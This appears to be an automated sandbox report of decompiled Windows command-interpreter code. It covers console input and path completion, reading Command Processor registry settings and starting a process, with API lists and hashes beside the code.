				signed int _t136;
				signed int _t137;
				signed int _t138;
				signed int _t141;
				signed int _t144;
				signed int _t145;
				void* _t146;
				void* _t147;
				signed int _t150;
				signed int _t151;
				void* _t154;
				long _t157;
				signed int _t158;
				void* _t160;
				void* _t167;
				void* _t172;
				void* _t173;

				_t71 = GetStdHandle(0xfffffff5);
				_v16 = _t71;
				if(_t71 == 0xffffffff) {
					__imp___get_osfhandle(1);
					_v16 = _t71;
				}
				if( *0x4a754081 == 0 ||  *0x4a7540a0 >= 0x20 ||  *0x4a7540a4 >= 0x20 || GetConsoleScreenBufferInfo(_v16,  &_v68) == 0) {
					_t72 = ReadConsoleW(_a4, _a8, _a12, _a16, 0);
				} else {
					_t132 =  *0x4a7540a4; // 0x20
					_v12 = _v68.dwCursorPosition;
					_t133 =  *0x4a7540a0; // 0x20
					_t144 = 1 << _t133;
					_t157 = 0;
					_v44 = 0x10;
					_v40 = 0;
					_v36 = 1 << _t132 | 1;
					_v32 = 0;
					E4A743599();
					_t154 = _a8;
					_v8 = 0;
					while(1) {
						L6:
						_t127 = _a16;
						_t82 = ReadConsoleW(_a4, _t154, _a12, _t127,  &_v44);
						_v28 = _t82;
						_t83 =  *_t127;
						_v24 =  *_t127;
						_t167 =  *0x4a7541b4 - _t157; // 0x0
						if(_t167 != 0) {
							E4A731E6C(_t83);
							if(_v8 != _t157) {
								HeapFree(GetProcessHeap(), _t157, _v8);
							}
							_v8 = _t157;
						}
						if(_v28 == _t157) {
							break;
						}
						_a8 = _t157;
						_t86 = 0;
						_t158 = _t157 | 0xffffffff;
						_t145 = _t144 | 0xffffffff;
						if( *_t127 <= 0) {
							L18:
							_t157 = 0;
							break;
						} else {
							while(1) {
								_t134 =  *(_t154 + _t86 * 2) & 0x0000ffff;
								if(_t134 == 0xd) {
									break;
								}
								_t172 = _t134 -  *0x4a7540a0; // 0x20
								if(_t172 == 0) {
									_t158 = _t86;
									goto L26;
								} else {
									_t173 = _t134 -  *0x4a7540a4; // 0x20
									if(_t173 == 0) {
										_t158 = _t86;
										_a8 = 1;
										L25:
										__eflags = _t145 - 0xffffffff;
										if(_t145 != 0xffffffff) {
											goto L18;
										} else {
											L26:
											__eflags = _t158 - 0xffffffff;
											if(_t158 == 0xffffffff) {
												goto L18;
											} else {
												_t135 = _v8;
												_t87 = 0;
												 *_t127 = _t158;
												 *((short*)(_t154 + _t158 * 2)) = 0;
												__eflags = _t135;
												if(_t135 == 0) {
													L37:
													_t129 = 1;
													__eflags = 1;
												} else {
													_t87 = _t154;
													while(1) {
														_t150 =  *_t87;
														__eflags = _t150 -  *_t135;
														if(_t150 !=  *_t135) {
															break;
														}
														__eflags = _t150;
														if(_t150 == 0) {
															L33:
															_t87 = 0;
														} else {
															_t151 =  *((intOrPtr*)(_t87 + 2));
															__eflags = _t151 -  *((intOrPtr*)(_t135 + 2));
															if(_t151 !=  *((intOrPtr*)(_t135 + 2))) {
																break;
															} else {
																_t87 = _t87 + 4;
																_t135 = _t135 + 4;
																__eflags = _t151;
																if(_t151 != 0) {
																	continue;
																} else {
																	goto L33;
																}
															}
														}
														L35:
														__eflags = _t87;
														if(_t87 != 0) {
															goto L37;
														} else {
															_t129 = 0;
														}
														goto L38;
													}
													asm("sbb eax, eax");
													asm("sbb eax, 0xffffffff");
													goto L35;
												}
												L38:
												__eflags = _a8;
												if(__eflags == 0) {
													__eflags = _t158 - 2;
													if(__eflags > 0) {
														__imp___wcsnicmp(_t154, "cd ", 3);
														_t160 = _t160 + 0xc;
														__eflags = _t87;
														if(__eflags == 0) {
															L47:
															_a8 = 1;
														} else {
															__imp___wcsnicmp(_t154, "rd ", 3);
															_t160 = _t160 + 0xc;
															__eflags = _t87;
															if(__eflags == 0) {
																goto L47;
															} else {
																__imp___wcsnicmp(_t154, "md ", 3);
																_t160 = _t160 + 0xc;
																__eflags = _t87;
																if(__eflags == 0) {
																	goto L47;
																} else {
																	__imp___wcsnicmp(_t154, L"chdir ", 6);
																	_t160 = _t160 + 0xc;
																	__eflags = _t87;
																	if(__eflags == 0) {
																		goto L47;
																	} else {
																		__imp___wcsnicmp(_t154, L"rmdir ", 6);
																		_t160 = _t160 + 0xc;
																		__eflags = _t87;
																		if(__eflags == 0) {
																			goto L47;
																		} else {
																			__imp___wcsnicmp(_t154, L"mkdir ", 6);
																			_t160 = _t160 + 0xc;
																			__eflags = _t87;
																			if(__eflags == 0) {
																				goto L47;
																			} else {
																				__imp___wcsnicmp(_t154, L"pushd ", 6);
																				_t160 = _t160 + 0xc;
																				__eflags = _t87;
																				if(__eflags == 0) {
																					goto L47;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
												_push(_t129);
												_push(_a8);
												_push( !(_v32 >> 4) & 0x00000001);
												_push(_t158);
												_push(_a12);
												_push(_t154);
												_t92 = E4A751877(_t129, _t154, _t158, __eflags);
												__eflags = _t92;
												if(_t92 == 0) {
													 *0x4a754034(0xffffffff);
													_t94 = _t154;
													_t59 = _t94 + 2; // 0x8
													_t146 = _t59;
													do {
														_t136 =  *_t94;
														_t94 = _t94 + 2;
														__eflags = _t136;
													} while (_t136 != 0);
													_t96 = _t94 - _t146;
													__eflags = _t96;
													_t97 = _t96 >> 1;
												} else {
													_t130 = _v16;
													_t109 = GetConsoleScreenBufferInfo(_t130,  &_v68);
													__eflags = _t109;
													if(_t109 != 0) {
														_t141 = _v62 - (_v12.X + _t158) / _v68.dwSize;
														__eflags = _t141;
														_v12.Y = _t141;
													}
													_t110 = _t154;
													_t50 = _t110 + 2; // 0x8
													_t147 = _t50;
													do {
														_t138 =  *_t110;
														_t110 = _t110 + 2;
														__eflags = _t138;
													} while (_t138 != 0);
													_v20 = _t110 - _t147 >> 1;
													SetConsoleCursorPosition(_t130, _v12);
													_push( &_v24);
													_push(_v12);
													_push(_v24);
													_push(0x20);
													_push(_t130);
													FillConsoleOutputCharacterW();
													WriteConsoleW(_t130, _t154, _v20,  &_v20, 0);
													_t97 = _v20;
												}
												__eflags = _v8;
												_v40 = _t97;
												if(_v8 != 0) {
													HeapFree(GetProcessHeap(), 0, _v8);
												}
												_t98 = _t154;
												_t63 = _t98 + 2; // 0x8
												_t144 = _t63;
												do {
													_t137 =  *_t98;
													_t98 = _t98 + 2;
													__eflags = _t137;
												} while (_t137 != 0);
												_t64 = (_t98 - _t144 >> 1) + 1; // 0x9
												_t159 = _t64;
												_t104 = HeapAlloc(GetProcessHeap(), 0, _t64 + _t64);
												_v8 = _t104;
												__eflags = _t104;
												if(_t104 == 0) {
													_t72 = 0;
												} else {
													E4A73185A(_t104, _t159, _t154);
													_t157 = 0;
													goto L6;
												}
											}
										}
									} else {
										_t86 = _t86 + 1;
										if(_t86 <  *_t127) {
											continue;
										} else {
											goto L18;
										}
									}
								}
								goto L65;
							}
							_t145 = _t86;
							goto L25;
						}
						goto L65;
					}
					if(_v8 != _t157) {
						HeapFree(GetProcessHeap(), _t157, _v8);
					}
					_t72 = _v28;
				}
				L65:
				return _t72;
			}

0x4a7434ec
0x4a7434f2
0x4a7434f8
0x4a744237
0x4a74423e
0x4a74423e
0x4a743508
0x4a7444ef
0x4a74353f
0x4a743542
0x4a743548
0x4a743552
0x4a743559
0x4a74355b
0x4a74355d
0x4a743564
0x4a743569
0x4a74356c
0x4a74356f
0x4a743574
0x4a743577
0x4a74357a
0x4a74357a
0x4a74357a
0x4a743589
0x4a744246
0x4a744249
0x4a74424b
0x4a74424e
0x4a744254
0x4a744256
0x4a74425e
0x4a74426b
0x4a74426b
0x4a744271
0x4a744271
0x4a744277
0x00000000
0x00000000
0x4a744279
0x4a74427c
0x4a74427e
0x4a744281
0x4a744286
0x4a7442a9
0x4a7442a9
0x00000000
0x4a744288
0x4a744288
0x4a744288
0x4a744290
0x00000000
0x00000000
0x4a744292
0x4a744299
0x4a7442cd
0x00000000
0x4a74429b
0x4a74429b
0x4a7442a2
0x4a7442d1
0x4a7442d3
0x4a7442da
0x4a7442da
0x4a7442dd
0x00000000
0x4a7442df
0x4a7442df
0x4a7442df
0x4a7442e2
0x00000000
0x4a7442e4
0x4a7442e4
0x4a7442e7
0x4a7442e9
0x4a7442eb
0x4a7442ef
0x4a7442f1
0x4a744328
0x4a74432a
0x4a74432a
0x4a7442f3
0x4a7442f3
0x4a7442f5
0x4a7442f5
0x4a7442f8
0x4a7442fb
0x00000000
0x00000000
0x4a7442fd
0x4a744300
0x4a744317
0x4a744317
0x4a744302
0x4a744302
0x4a744306
0x4a74430a
0x00000000
0x4a74430c
0x4a74430c
0x4a74430f
0x4a744312
0x4a744315
0x00000000
0x00000000
0x00000000
0x00000000
0x4a744315
0x4a74430a
0x4a744320
0x4a744320
0x4a744322
0x00000000
0x4a744324
0x4a744324
0x4a744324
0x00000000
0x4a744322
0x4a74431b
0x4a74431d
0x00000000
0x4a74431d
0x4a74432b
0x4a74432b
0x4a74432f
0x4a744335
0x4a744338
0x4a744346
0x4a74434c
0x4a74434f
0x4a744351
0x4a7443d1
0x4a7443d1
0x4a744353
0x4a74435b
0x4a744361
0x4a744364
0x4a744366
0x00000000
0x4a744368
0x4a744370
0x4a744376
0x4a744379
0x4a74437b
0x00000000
0x4a74437d
0x4a744385
0x4a74438b
0x4a74438e
0x4a744390
0x00000000
0x4a744392
0x4a74439a
0x4a7443a0
0x4a7443a3
0x4a7443a5
0x00000000
0x4a7443a7
0x4a7443af
0x4a7443b5
0x4a7443b8
0x4a7443ba
0x00000000
0x4a7443bc
0x4a7443c4
0x4a7443ca
0x4a7443cd
0x4a7443cf
0x00000000
0x00000000
0x4a7443cf
0x4a7443ba
0x4a7443a5
0x4a744390
0x4a74437b
0x4a744366
0x4a744351
0x4a744338
0x4a7443db
0x4a7443dc
0x4a7443e7
0x4a7443e8
0x4a7443e9
0x4a7443ec
0x4a7443ed
0x4a7443f2
0x4a7443f4
0x4a74446a
0x4a744470
0x4a744472
0x4a744472
0x4a744475
0x4a744475
0x4a744479
0x4a74447a
0x4a74447a
0x4a74447f
0x4a74447f
0x4a744481
0x4a7443f6
0x4a7443f6
0x4a7443fe
0x4a744404
0x4a744406
0x4a744419
0x4a744419
0x4a74441b
0x4a74441b
0x4a74441f
0x4a744421
0x4a744421
0x4a744424
0x4a744424
0x4a744428
0x4a744429
0x4a744429
0x4a744436
0x4a744439
0x4a744442
0x4a744443
0x4a744446
0x4a744449
0x4a74444b
0x4a74444c
0x4a74445d
0x4a744463
0x4a744463
0x4a744483
0x4a744487
0x4a74448a
0x4a744498
0x4a744498
0x4a74449e
0x4a7444a0
0x4a7444a0
0x4a7444a3
0x4a7444a3
0x4a7444a7
0x4a7444a8
0x4a7444a8
0x4a7444b1
0x4a7444b1
0x4a7444c1
0x4a7444c7
0x4a7444ca
0x4a7444cc
0x4a7444dd
0x4a7444ce
0x4a7444d1
0x4a7444d6
0x00000000
0x4a7444d6
0x4a7444cc
0x4a7442e2
0x4a7442a4
0x4a7442a4
0x4a7442a7
0x00000000
0x00000000
0x00000000
0x00000000
0x4a7442a7
0x4a7442a2
0x00000000
0x4a744299
0x4a7442c9
0x00000000
0x4a7442c9
0x00000000
0x4a744286
0x4a7442ae
0x4a7442bb
0x4a7442bb
0x4a7442c1
0x4a7442c1
0x4a7444f5
0x4a7444f9

APIs

GetStdHandle.KERNEL32(000000F5,?,00000004,74EC5129,00000000,?,4A73745B,-00000003,00000000,00000000,00000000,00000000,?), ref: 4A7434EC
GetConsoleScreenBufferInfo.KERNEL32 ref: 4A743531
ReadConsoleW.KERNEL32(4A754210,00000006,00000021,?,00000010), ref: 4A743589
_get_osfhandle.MSVCRT ref: 4A744237
GetProcessHeap.KERNEL32(00000000,00000000,?,4A73745B), ref: 4A744264
HeapFree.KERNEL32(00000000,?,4A73745B), ref: 4A74426B
GetProcessHeap.KERNEL32(00000000,?,?,4A73745B), ref: 4A7442B4
HeapFree.KERNEL32(00000000,?,4A73745B), ref: 4A7442BB

Part of subcall function 4A731E6C: EnterCriticalSection.KERNEL32(4A73851C), ref: 4A731E72
Part of subcall function 4A731E6C: LeaveCriticalSection.KERNEL32(?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210,?,4A731C8D), ref: 4A731E85

_wcsnicmp.MSVCRT ref: 4A744346
_wcsnicmp.MSVCRT ref: 4A74435B
_wcsnicmp.MSVCRT ref: 4A744370
_wcsnicmp.MSVCRT ref: 4A744385
_wcsnicmp.MSVCRT ref: 4A74439A
_wcsnicmp.MSVCRT ref: 4A7443AF
_wcsnicmp.MSVCRT ref: 4A7443C4
GetConsoleScreenBufferInfo.KERNEL32 ref: 4A7443FE
SetConsoleCursorPosition.KERNEL32 ref: 4A744439
FillConsoleOutputCharacterW.KERNEL32(00000001,00000020,?,4A754210,?), ref: 4A74444C
WriteConsoleW.KERNEL32 ref: 4A74445D
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 4A744491
HeapFree.KERNEL32(00000000), ref: 4A744498
GetProcessHeap.KERNEL32(00000000,00000008,?,4A73745B), ref: 4A7444BA
HeapAlloc.KERNEL32(00000000,?,4A73745B), ref: 4A7444C1
ReadConsoleW.KERNEL32(4A754210,00000006,00000021,?,00000000), ref: 4A7444EF

Strings

chdir , xrefs: 4A74437F
rmdir , xrefs: 4A744394
pushd , xrefs: 4A7443BE
rd , xrefs: 4A744355
md , xrefs: 4A74436A
cd , xrefs: 4A744340
mkdir , xrefs: 4A7443A9

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$Console_wcsnicmp$Process$Free$BufferCriticalInfoReadScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
API String ID: 1493623682-3100821235
Opcode ID: 65c314b9a9535682925f20fb3b9f742b7c24e01664218670a66acc783491e256
Instruction ID: fc7020f07fc6e1e3882759c0e283fb6afa6b50658b4897a7d928bb2eda6fcdf0
Opcode Fuzzy Hash: 65c314b9a9535682925f20fb3b9f742b7c24e01664218670a66acc783491e256
Instruction Fuzzy Hash: 07B13576944216EBDF709FA4CC49BAE7FBDEF0575AF018110F912E6580D7308A18EB50

Uniqueness

Uniqueness Score: -1.00%

Function 4A737E13, Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 314
registryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E4A737E13(int _a4, intOrPtr _a8) {
				signed int _v8;
				long _v4104;
				int _v4108;
				int _v4112;
				void* _v4116;
				intOrPtr* _v4120;
				char _v4124;
				intOrPtr _v4128;
				intOrPtr _v4132;
				char _v4136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t99;
				int _t101;
				signed int _t113;
				signed int _t117;
				signed int _t121;
				long _t135;
				int _t136;
				long _t139;
				wchar_t* _t140;
				signed int _t143;
				wchar_t* _t144;
				signed int _t147;
				wchar_t* _t148;
				signed int _t151;
				signed int _t155;
				int _t161;
				int _t162;
				intOrPtr _t165;
				void* _t174;
				void* _t175;
				wchar_t** _t176;
				signed int _t178;
				void* _t179;
				void* _t181;

				E4A732C26(0x1024);
				_t99 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t99 ^ _t178;
				_t101 = _a4;
				_t174 = 2;
				_v4136 = 0x80000002;
				_v4132 = 0x80000001;
				if(_a8 < _t174) {
					L40:
					return E4A7313A9(_t101, _t161, _v8 ^ _t178, _t174, _t175, _t176);
				} else {
					if( *0x4a770670 != 0) {
						 *0x4a754081 = 1;
					}
					_push(__ebx);
					__ecx =  &_v4136;
					_push(__esi);
					__ecx =  &_v4136 - __eax;
					_push(__edi);
					__edi = RegQueryValueExW;
					_v4120 = __eax;
					_v4128 = __ecx;
					_v4124 = __edx;
					__ebx = 0x1000;
					while(1) {
						_t176 = 0;
						_t101 = RegOpenKeyExW( *(_t165 + _v4120), L"Software\\Microsoft\\Command Processor", 0, 0x2000000,  &_v4116);
						if(_t101 != 0) {
							goto L38;
						}
						_v4108 = 0;
						_v4112 = _t161;
						_t113 = RegQueryValueExW(_v4116, L"DisableUNCCheck", 0,  &_v4108,  &_v4104,  &_v4112);
						if(_t113 == 0) {
							if(_v4108 != 4) {
								if(_v4108 != 1) {
									goto L7;
								}
								_t148 =  &_v4104;
								__imp___wtol(_t148);
								asm("sbb al, al");
								_t151 =  ~(_t148 - 1) + 1;
								L51:
								 *0x4a7706b0 = _t151;
								goto L7;
							}
							_t151 = _t113 & 0xffffff00 | _v4104 != 0x00000000;
							goto L51;
						}
						L7:
						_v4112 = _t161;
						_t117 = RegQueryValueExW(_v4116, L"EnableExtensions", _t176,  &_v4108,  &_v4104,  &_v4112);
						if(_t117 != 0) {
							L11:
							_v4112 = _t161;
							_t121 = RegQueryValueExW(_v4116, L"DelayedExpansion", _t176,  &_v4108,  &_v4104,  &_v4112);
							if(_t121 == 0) {
								if(_v4108 != 4) {
									if(_v4108 != 1) {
										goto L12;
									}
									_t140 =  &_v4104;
									__imp___wtol(_t140);
									asm("sbb al, al");
									_t143 =  ~(_t140 - 1) + 1;
									L57:
									 *0x4a754082 = _t143;
									goto L12;
								}
								_t143 = _t121 & 0xffffff00 | _v4104 != _t176;
								goto L57;
							}
							L12:
							_v4112 = _t161;
							if(RegQueryValueExW(_v4116, L"DefaultColor", _t176,  &_v4108,  &_v4104,  &_v4112) != 0) {
								L16:
								_v4112 = _t161;
								if(RegQueryValueExW(_v4116, L"CompletionChar", _t176,  &_v4108,  &_v4104,  &_v4112) != 0) {
									L24:
									_v4112 = _t161;
									if(RegQueryValueExW(_v4116, L"PathCompletionChar", _t176,  &_v4108,  &_v4104,  &_v4112) != 0) {
										_t101 =  *0x4a7540a4; // 0x20
										L32:
										_t162 =  *0x4a7540a0; // 0x20
										_t174 = 0x20;
										if(_t162 != _t174) {
											_t181 = _t101 - _t174;
											L34:
											if(_t181 == 0 && _t162 < _t174) {
												 *0x4a7540a4 = _t162;
											}
											L36:
											_v4112 = _t161;
											if(RegQueryValueExW(_v4116, L"AutoRun", _t176,  &_v4108,  &_v4104,  &_v4112) == 0) {
												if(_v4108 == 2) {
													_t155 = _v4112 >> 1;
													_t177 = _t178 + _t155 * 2 - 0x1000;
													if(ExpandEnvironmentStringsW( &_v4104, _t178 + _t155 * 2 - 0x1000, 0x7fe - _t155) == 0) {
														_v4104 = 0;
													} else {
														E4A73185A( &_v4104, 0x800, _t177);
													}
													_t176 = 0;
												}
												if(_v4104 != _t176) {
													 *_v4120 = E4A7319D6( &_v4104);
												}
											}
											RegCloseKey(_v4116);
											goto L38;
										}
										if(_t101 < _t174) {
											 *0x4a7540a0 = _t101;
											goto L36;
										}
										goto L34;
									}
									if(_v4108 != 4) {
										if(_v4108 != 1) {
											_t101 =  *0x4a7540a4; // 0x20
											L28:
											if(_t101 == _t176 || _t101 == 0xd || _t101 > 0x20) {
												_t101 = 0x20;
												 *0x4a7540a4 = _t101;
											}
											goto L32;
										}
										_t101 = wcstol( &_v4104, _t176, _t176);
										_t179 = _t179 + 0xc;
										L27:
										 *0x4a7540a4 = _t101;
										goto L28;
									}
									_t101 = _v4104;
									goto L27;
								}
								if(_v4108 != 4) {
									if(_v4108 != 1) {
										_t135 =  *0x4a7540a0; // 0x20
										L20:
										if(_t135 == _t176 || _t135 == 0xd || _t135 > 0x20) {
											_t136 = 0x20;
											 *0x4a7540a0 = _t136;
										}
										goto L24;
									}
									_t135 = wcstol( &_v4104, _t176, _t176);
									_t179 = _t179 + 0xc;
									L19:
									 *0x4a7540a0 = _t135;
									goto L20;
								}
								_t135 = _v4104;
								goto L19;
							}
							if(_v4108 != 4) {
								if(_v4108 == 1) {
									_t139 = wcstol( &_v4104, _t176, _t176);
									_t179 = _t179 + 0xc;
									L15:
									 *0x4a75408a = _t139;
									goto L16;
								}
								goto L16;
							}
							_t139 = _v4104;
							goto L15;
						}
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t144 =  &_v4104;
								__imp___wtol(_t144);
								asm("sbb al, al");
								_t147 =  ~(_t144 - 1) + 1;
								L10:
								 *0x4a754081 = _t147;
								goto L11;
							}
							goto L11;
						}
						_t147 = _t117 & 0xffffff00 | _v4104 != _t176;
						goto L10;
						L38:
						_v4120 = _v4120 + 4;
						_t62 =  &_v4124;
						 *_t62 = _v4124 - 1;
						if( *_t62 != 0) {
							_t165 = _v4128;
							continue;
						}
						__imp__time();
						srand(_t101);
						_t175 = _t176;
						_pop(_t176);
						_pop(_t161);
						goto L40;
					}
				}
			}

0x4a737e1d
0x4a737e22
0x4a737e29
0x4a737e2c
0x4a737e31
0x4a737e35
0x4a737e3f
0x4a737e49
0x4a7380f9
0x4a738104
0x4a737e4f
0x4a737e56
0x4a737e58
0x4a737e58
0x4a737e5f
0x4a737e60
0x4a737e66
0x4a737e67
0x4a737e69
0x4a737e6a
0x4a737e70
0x4a737e76
0x4a737e7c
0x4a737e82
0x4a737e87
0x4a737e99
0x4a737ea4
0x4a737eac
0x00000000
0x00000000
0x4a737ed3
0x4a737ed9
0x4a737edf
0x4a737ee3
0x4a7464c6
0x4a7464da
0x00000000
0x00000000
0x4a7464e0
0x4a7464e7
0x4a7464f0
0x4a7464f3
0x4a7464f5
0x4a7464f5
0x00000000
0x4a7464f5
0x4a7464ce
0x00000000
0x4a7464ce
0x4a737ee9
0x4a737f0a
0x4a737f10
0x4a737f14
0x4a737f31
0x4a737f52
0x4a737f58
0x4a737f5c
0x4a746520
0x4a746534
0x00000000
0x00000000
0x4a74653a
0x4a746541
0x4a74654a
0x4a74654d
0x4a74654f
0x4a74654f
0x00000000
0x4a74654f
0x4a746528
0x00000000
0x4a746528
0x4a737f62
0x4a737f83
0x4a737f8d
0x4a737fa9
0x4a737fca
0x4a737fd4
0x4a73800a
0x4a73802b
0x4a738035
0x4a738261
0x4a73806f
0x4a73806f
0x4a738078
0x4a73807c
0x4a737e06
0x4a73808b
0x4a73808b
0x4a7465d1
0x4a7465d1
0x4a738096
0x4a7380b7
0x4a7380c1
0x4a7465e4
0x4a7465ec
0x4a7465f5
0x4a74660d
0x4a746625
0x4a74660f
0x4a74661c
0x4a74661c
0x4a74662c
0x4a74662c
0x4a746635
0x4a74664d
0x4a74664d
0x4a746635
0x4a7380cd
0x00000000
0x4a7380cd
0x4a738085
0x4a7465c6
0x00000000
0x4a7465c6
0x00000000
0x4a738085
0x4a738042
0x4a7465a2
0x4a7465bb
0x4a738055
0x4a738058
0x4a738068
0x4a738069
0x4a738069
0x00000000
0x4a738058
0x4a7465ad
0x4a7465b3
0x4a73804f
0x4a73804f
0x00000000
0x4a73804f
0x4a738048
0x00000000
0x4a738048
0x4a737fdd
0x4a746577
0x4a746590
0x4a737ff0
0x4a737ff3
0x4a738003
0x4a738004
0x4a738004
0x00000000
0x4a737ff3
0x4a746582
0x4a746588
0x4a737fea
0x4a737fea
0x00000000
0x4a737fea
0x4a737fe3
0x00000000
0x4a737fe3
0x4a737f96
0x4a738256
0x4a746562
0x4a746568
0x4a737fa3
0x4a737fa3
0x00000000
0x4a737fa3
0x00000000
0x4a73825c
0x4a737f9c
0x00000000
0x4a737f9c
0x4a737f1d
0x4a738244
0x4a7464ff
0x4a746506
0x4a74650f
0x4a746512
0x4a737f2c
0x4a737f2c
0x00000000
0x4a737f2c
0x00000000
0x4a73824a
0x4a737f29
0x00000000
0x4a7380d3
0x4a7380d3
0x4a7380da
0x4a7380da
0x4a7380e0
0x4a738232
0x00000000
0x4a738232
0x4a7380e7
0x4a7380ee
0x4a7380f6
0x4a7380f7
0x4a7380f8
0x00000000
0x4a7380f8
0x4a737e87

APIs

RegOpenKeyExW.KERNEL32 ref: 4A737EA4
RegQueryValueExW.KERNEL32(?,DisableUNCCheck,00000000,?,?,?), ref: 4A737EDF
RegQueryValueExW.KERNEL32(?,EnableExtensions,00000000,00000001,?,?), ref: 4A737F10
RegQueryValueExW.KERNEL32(?,DelayedExpansion,00000000,00000001,?,?), ref: 4A737F58
RegQueryValueExW.KERNEL32(?,DefaultColor,00000000,00000001,?,?), ref: 4A737F89
RegQueryValueExW.KERNEL32(?,CompletionChar,00000000,00000001,?,?), ref: 4A737FD0
RegQueryValueExW.KERNEL32(?,PathCompletionChar,00000000,00000001,?,?), ref: 4A738031
RegQueryValueExW.KERNEL32(?,AutoRun,00000000,00000004,?,?), ref: 4A7380BD
RegCloseKey.KERNEL32(?), ref: 4A7380CD
time.MSVCRT ref: 4A7380E7
srand.MSVCRT ref: 4A7380EE

Strings

AutoRun, xrefs: 4A7380AC
CompletionChar, xrefs: 4A737FBF
DefaultColor, xrefs: 4A737F78
DisableUNCCheck, xrefs: 4A737EC8
Software\Microsoft\Command Processor, xrefs: 4A737E9C
DelayedExpansion, xrefs: 4A737F47
PathCompletionChar, xrefs: 4A738020
EnableExtensions, xrefs: 4A737EFF

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: QueryValue$CloseOpensrandtime
String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
API String ID: 145004033-3846321370
Opcode ID: e4495c9902b3c768526e9ef5e06ba46a3af5e37adbd3ec6a2ebe81371c6f9446
Instruction ID: 298064643be4c82370698c6c87317dd1b2c02bced657fb5ac2c26d629cbe7753
Opcode Fuzzy Hash: e4495c9902b3c768526e9ef5e06ba46a3af5e37adbd3ec6a2ebe81371c6f9446
Instruction Fuzzy Hash: 47C182B68052A8EADB71DB50CD44ADA7BBCEF09302F0180E6E689D2501D7749BCCCF65

Uniqueness

Uniqueness Score: -1.00%

Function 4A733E02, Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 327
threadprocessstringCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E4A733E02(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				void* _t103;
				intOrPtr _t111;
				intOrPtr _t116;
				WCHAR* _t118;
				int _t119;
				long _t122;
				signed int _t126;
				int _t130;
				void* _t139;
				void* _t141;
				void* _t147;
				void* _t153;
				void* _t154;
				void* _t160;
				void* _t163;
				void* _t164;
				void* _t165;
				int _t170;
				int _t171;
				int _t175;
				WCHAR* _t176;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t189;
				void* _t190;
				void* _t198;
				int _t199;

				_t163 = __ecx;
				E4A7313E1(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t178 - 0x7c)) =  *((intOrPtr*)(_t178 + 8));
				 *(_t178 - 0x74) =  *(_t178 + 0x14);
				_t174 =  *(_t178 + 0x18);
				 *(_t178 - 0x68) =  *(_t178 + 0x18);
				 *((intOrPtr*)(_t178 - 0x84)) = 0;
				 *((intOrPtr*)(_t178 - 0x9c)) = 0;
				 *((intOrPtr*)(_t178 - 0x6c)) = 0;
				 *((intOrPtr*)(_t178 - 0x78)) = 0x20;
				_t170 = 1;
				_t97 = _t178 - 0x140;
				__imp__InitializeProcThreadAttributeList(_t97, 1, 0, _t178 - 0x78, 0x4a734098, 0x174);
				if(_t97 == 0) {
					 *0x4a754128 = GetLastError();
					E4A74065B(_t174, _t174);
					L34:
					L23:
					return E4A7313CA(0, _t170, _t174);
				}
				 *((intOrPtr*)(_t178 - 0x80)) = 1;
				_t103 = _t178 - 0x140;
				__imp__UpdateProcThreadAttribute(_t103, 0, 0x60001, _t178 - 0x80, 4, 0, 0);
				if(_t103 == 0) {
					 *0x4a754128 = GetLastError();
					E4A74065B(_t174, _t174);
					__imp__DeleteProcThreadAttributeList(_t178 - 0x140);
					goto L34;
				} else {
					_t175 = 0x48;
					memset(_t178 - 0xe4, 0, _t175);
					_t180 = _t179 + 0xc;
					 *((intOrPtr*)(_t178 - 0xa0)) = _t178 - 0x140;
					 *(_t178 - 0xe4) = _t175;
					 *((intOrPtr*)(_t178 - 0xd8)) =  *((intOrPtr*)(_t178 + 0x1c));
					 *((intOrPtr*)(_t178 - 0xd4)) = 0;
					 *((intOrPtr*)(_t178 - 0xd0)) = 1;
					_t111 = 0x64;
					 *((intOrPtr*)(_t178 - 0xcc)) = _t111;
					 *((intOrPtr*)(_t178 - 0xc8)) = _t111;
					 *((intOrPtr*)(_t178 - 0xb8)) = 0;
					 *(_t178 - 0xb4) = 1;
					 *(_t178 - 0x184) = 0x44;
					GetStartupInfoW(_t178 - 0x184);
					 *((intOrPtr*)(_t178 - 0xdc)) =  *((intOrPtr*)(_t178 - 0x17c));
					 *((intOrPtr*)(_t178 - 4)) = 0;
					_t174 = L"COPYCMD";
					if(E4A73321B(_t163, L"COPYCMD") == 0) {
						_t115 = E4A733AFC;
					}
					_t116 = E4A7319D6(_t115);
					 *((intOrPtr*)(_t178 - 0x6c)) = _t116;
					if(_t116 == 0) {
						L36:
						_push(0xfffffffe);
						_push(_t178 - 0x10);
						_push(0x4a7540ac);
						L4A75219B();
						goto L34;
					}
					_t189 =  *0x4a7540e0; // 0x0
					if(_t189 != 0) {
						L7:
						_t118 = E4A732148( *(_t178 - 0x68), 0x5c);
						if(_t118 != 0 && lstrcmpW(_t118, L"\\XCOPY.EXE") == 0) {
							E4A74CD7C(_t163, _t174, E4A739A54);
						}
						_t119 =  *0x4a7540b4; // 0x0
						if(_t119 == 0 ||  *((intOrPtr*)(_t119 + 0x30)) == 0) {
							L11:
							_t176 = 0x4a755260;
